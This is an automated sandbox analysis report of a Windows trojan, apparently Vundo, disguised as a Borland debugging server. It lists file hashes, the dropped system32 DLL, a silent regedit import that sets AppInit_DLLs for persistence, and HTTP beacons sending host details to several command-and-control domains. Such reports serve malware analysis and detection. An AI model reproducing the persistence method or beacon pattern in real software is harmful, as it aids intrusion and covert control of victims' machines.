Analysis Date: 2013-10-20 12:03:47
MD5: fb5bcab1cb88e45db7e1437893fd2f6f
SHA1: 03bbb1dd8fab51e4dbea9c94a2839bcfd748718a

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text md5: 21022f33153be445155da9235cda3d2c sha1: e316c68a065f509bf0f10d4da2d9d51779e7337c size: 90112
Section _ASM2 md5: 37a257effc7dd77530057912945d6b1f sha1: 1e853691fb24ea60606ae9080be4009cfa8f98bc size: 62976
Section .rdata md5: 3c7e6da28317c2c8b8ef705dfd06a2b2 sha1: fbf1019628a1ec12775e0e365ee92bcf0b6d0e14 size: 7680
Section .data md5: 40efc981febb7a5e2d2ab4cd63a866b0 sha1: 78972b7d931c9708fa1af66e4fdb9928219b9971 size: 5120
Section .tls md5: bf619eac0cdf3f68d496ea9344137e8b sha1: 5c3eb80066420002bc3dcc7ca4ab6efad7ed4ae5 size: 512
Section .rsrc md5: 0700f6ce8a5c5f57f0abb43c0bfc0e28 sha1: 013ef4a4db6e77f6a2b3b73eb17e54ab68d4b788 size: 17920
Timestamp: 2012-09-19 19:14:42
Version:
LegalCopyright: Copyright © Borland Software Corporation 1990, 2001
InternalName: BORDBG61
FileVersion: 70.08.08.1442
CompanyName: Borland Software Corporation
ProductName: Borland Remote Debugging Server
ProductVersion: 51.00
FileDescription: Borland Remote Debugging Server
OriginalFilename: bordbg61.exe
Packer: Microsoft Visual C++ ?.?
PEhash: 19746141e60fb07d4ab720b5daa8a41068a18ff3
AV avg: Generic_r.BGJ
AV avira: TR/Vundo.Gen8

Runtime Details:

Process
↳ C:\malware.exe

Creates File: C:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Creates File: C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg

Process
↳ C:\WINDOWS\Explorer.EXE

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\Component Categories\{00021494-0000-0000-C000-000000000046}\Enum\Implementing ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\NetCache\AdminPinStartTime ➝ NULL
Registry: HKEY_CURRENT_USER\SessionInformation\ProgramCount ➝ NULL
Creates File: C:\WINDOWS\system32\jloaxga.dll
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Cookies\cf
Deletes File: C:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Deletes File: C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Creates Process: C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg

Process
↳ C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg

Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs ➝ C:\WINDOWS\system32\jloaxga.dll\\x00

Network Details:

HTTP GET: http://flersomstk.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1971&av=0&vm=0&al=0&p=49&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg54cJNa5BXQmxwszu/I29ZDHBSS6UhmxmPzmIYu/Rb89
User-Agent:
HTTP GET: http://instrango.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1971&av=0&vm=0&al=0&p=49&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg54cJNa5BXQmxwszu/I29ZDHBSS6UhmxmOaSzk5/b1OP
User-Agent:
HTTP GET: http://nsknock.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1971&av=0&vm=0&al=0&p=49&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg54cJNa5BXQmxwszu/I29ZDHBSS6UhmxmHia6SCU0UEC
User-Agent:
HTTP GET: http://tegimode.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1971&av=0&vm=0&al=0&p=49&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg54cJNa5BXQmxwszu/I29ZDHBSS6UhmxmF1dXVmRfA/d
User-Agent:
HTTP GET: http://denadb.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1971&av=0&vm=0&al=0&p=49&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg54cJNa5BXQmxwszu/I29ZDHBSS6UhmxmL2Cx7WpI2IQ
User-Agent:
HTTP GET: http://foradns.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1971&av=0&vm=0&al=0&p=49&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg54cJNa5BXQmxwszu/I29ZDHBSS6UhmxmL2ySl/AhiFk
User-Agent:
HTTP GET: http://nshouse1.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1971&av=0&vm=0&al=0&p=49&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg54cJNa5BXQmxwszu/I29ZDHBSS6UhmxmPjov4Nuxyrg
User-Agent:
HTTP GET: http://91.233.89.106/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1971&av=0&vm=0&al=0&p=49&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg54cJNa5BXQmxwszu/I29ZDHBSS6UhmxmLd519q7I76X
User-Agent:
Flows TCP: 192.168.1.1:1031 ➝ 62.116.143.17:80
Flows TCP: 192.168.1.1:1032 ➝ 141.8.225.46:80
Flows TCP: 192.168.1.1:1033 ➝ 190.93.244.20:80
Flows TCP: 192.168.1.1:1034 ➝ 141.101.115.20:80
Flows TCP: 192.168.1.1:1035 ➝ 141.101.114.20:80
Flows TCP: 192.168.1.1:1036 ➝ 208.73.211.246:80
Flows TCP: 192.168.1.1:1037 ➝ 208.73.211.247:80
Flows TCP: 192.168.1.1:1038 ➝ 91.233.89.106:80

Raw Pcap

Strings